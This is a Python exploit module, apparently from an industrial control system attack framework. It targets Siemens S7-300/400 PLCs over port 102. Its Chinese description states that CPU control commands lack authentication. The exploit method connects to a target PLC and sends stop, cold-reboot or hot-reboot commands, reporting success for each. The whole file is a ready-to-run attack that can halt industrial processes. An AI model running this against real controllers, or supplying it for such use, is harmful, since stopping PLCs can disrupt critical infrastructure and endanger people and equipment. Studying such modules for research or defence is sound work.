#!/usr/bin/env python
# coding=utf-8

from core.exploit import *
from s7.plc import *


class MyScript(BaseExploit):
    register_info = {
        'ID' : 'ICF-2017-00010001',
        'Name' : '西门子 S7-300/400 PLC CPU控制',
        'Author' : 'w3h',
        'License': ISF_LICENSE,
        'Create_Date' : '2015-04-09',
        'Description' : '''西门子 S7-300 和 S7-400 PLC的CPU控制指定没有任何的验证机制，导致攻击者可以向PLC发送CPU控制指令。''',

        'Vendor' : VENDOR.SI,
        'Device' : ['S7-300', 'S7-400'],
        'App' : '',
        'Protocol' : 's7',
        'References': {'CVE': '', 'CNVD': '', 'OSVDB': '', 'CNNVD': ''},

        'Risk' : RISK.H, #H/M/L
        'VulType' : VULTYPE.REP
    }

    register_options = [
        mkopt_rport(102),
        mkopt('--Slot', action='store', dest='Slot', type='int',
            default=2, help='The slot of plc [default:2].'),
        mkopt('--Command', action='store', dest='Command', type='string',
            default="stop", help='The cpu control cmd [stop/cold/hot].'),
    ]

    def exploit(self, *args, **kwargs):
        slot = self.getParam("Slot")
        cmd = self.getParam("Command")
        t = PLCClient(self.TargetIp, port = int(self.TargetPort), slot = int(slot))
        t.createConn()
        t.setupCommunication()

        if cmd == 'cold':
            t.coldReboot()
            return "cold reboot cpu successed!!!"
        elif cmd == 'hot':
            t.hotReboot()
            return "hot reboot cpu successed!!!"
        elif cmd == "stop":
            t.stop()
            return "stop cpu successed!!!"
        else:
            pass


MainEntry(MyScript, __name__)
